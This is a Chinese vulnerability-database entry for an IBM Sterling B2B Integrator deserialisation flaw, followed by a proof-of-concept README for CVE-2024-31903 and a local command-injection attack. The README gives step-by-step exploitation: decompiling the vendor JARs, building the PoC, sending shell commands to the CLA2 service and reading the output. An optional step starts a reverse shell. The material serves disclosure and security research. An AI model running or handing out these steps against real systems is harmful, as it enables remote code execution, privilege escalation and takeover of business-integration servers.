IBM Sterling B2B Integrator 代码问题漏洞
描述:IBM Sterling B2B Integrator是美国国际商业机器(IBM)公司的一套集成了重要的B2B流程、交易和关系的软件。该软件支持与不同的合作伙伴社区之间实现复杂的B2B流程的安全集成。 IBM Sterling B2B Integrator版本至6.1.2.5版本和6.2.0.0版本至6.2.0.2版本存在代码问题漏洞,该漏洞源于不受信任的数据反序列化,允许本地网络上的攻击者在系统上执行任意代码。
PoC code for the LPE and RCE (CVE-2024-31903) attacks against the IBM Sterling B2B Integrator
# IBM Sterling B2B Integrator PoC
Proof of concept code for the exploitation of the vulnerabilities discovered against IBM Sterling B2B Integrator, versions to, and to for Linux, Windows and AIX systems:
- LPE Command Injection - if authentication is disabled
- Pre-auth Deserialisation RCE - assigned CVE-2024-31903, see the relevant IBM advisory here: https://www.ibm.com/support/pages/node/7172233
More details about these issues can be found in my DistricCon talk "To B or not 2B: Breaking the IBM B2B Integrator with, and without authentication":
## Repo Structure
Most of this code in this repo refers to the LPE command injection attack.
The Python binary client `bin_client.py` can be used to send messages manually to CLA2, allowing exploitation of the deserialisation RCE vulnerability.
## Usage
$ java Main
$ Usage: Main <cmdLine> <outfile_or_SEND> [host] [port]
The PoC accepts two parameters:
- The shell command to be executed by the target CLA2 client
- A path to write the serialised Java message to disk, to then be analysed further/sent manually with something like `bin_client.py`, or the string "SEND" to send it immediately to host:port where a CLA2 client is listening on
## Instructions
The source code included in this repository is deliberately incomplete, as certain classes from the CLA2 susbystem are required. Depending on filesystem permissions of the installation directory, you might be able to access the JAR files
Assuming you have retrieved the relevant files from the JAR decompilation. Will not be uplaoded here as they constitute IBM IP
1. Decompile `CLA2Client.jar`
2. In the decompiled code, locate files `CmdLine2Result.java` and `CmdLine2Parms.java`
3. Copy and paste them next to `Main.java` to replicate the directory structure of the original application's java package
4. Compile the PoC program - ideally using the JDK packaged by the application
${B2BHOME}/INSTALL/jdk/bin/javac src/com/sterlingcommerce/woodstock/services/cmdline2/*.java
5. Execute it - again, using the JDK packaged by the application if possible
${B2BHOME}/appl/SFG/INSTALL/jdk/bin/java -classpath src/ com.sterlingcommerce.woodstock.services.cmdline2.Main '/bin/sh -c "id > /tmp/result"' SEND 5052
[+] Creating object...
[+] Sending object to
[+] ...Sent!
[+] Receiving header...
[+] ...header received: RESULT
[+] Receiving result...
[+] Result received:
##[DEBUG]## CmdLine2Result:
******* end of CmdLine2Result *******
[+] clr.statusRpt: null
[+] clr.exceptionString: null
[+] clr.somethingToLog: CmdLine2Thread.runCommand: cmdLine before execution=/bin/sh -c "id > /tmp/result"
##[REMOTE DEBUG]## parm0=/bin/sh
##[REMOTE DEBUG]## parm1=-c
##[REMOTE DEBUG]## parm2=id > /tmp/result
6. (Optional) To obtain a fully interactive shell, upload the `revshell.py` and `revshell_listener.py` scripts onto the target system, and start the listener. Then, replace the PoC's command parameter with an invocation of the reverse shell script as below:
${B2BHOME}/INSTALL/jdk/bin/java -classpath src/ com.sterlingcommerce.woodstock.services.cmdline2.Main 'python3 /tmp/revshell.py 9090' SEND
[4.0K] /data/pocs/4aeacc8c57a41dd89eaed7b15dcd9c5f7b98870a
├── [ 411] bin_client.py
├── [3.4K] README.md
├── [ 545] revshell_listener.py
├── [ 226] revshell.py
└── [4.0K] src
└── [4.0K] com
└── [4.0K] sterlingcommerce
└── [4.0K] woodstock
└── [4.0K] services
└── [4.0K] cmdline2
└── [3.3K] Main.java
6 directories, 5 files
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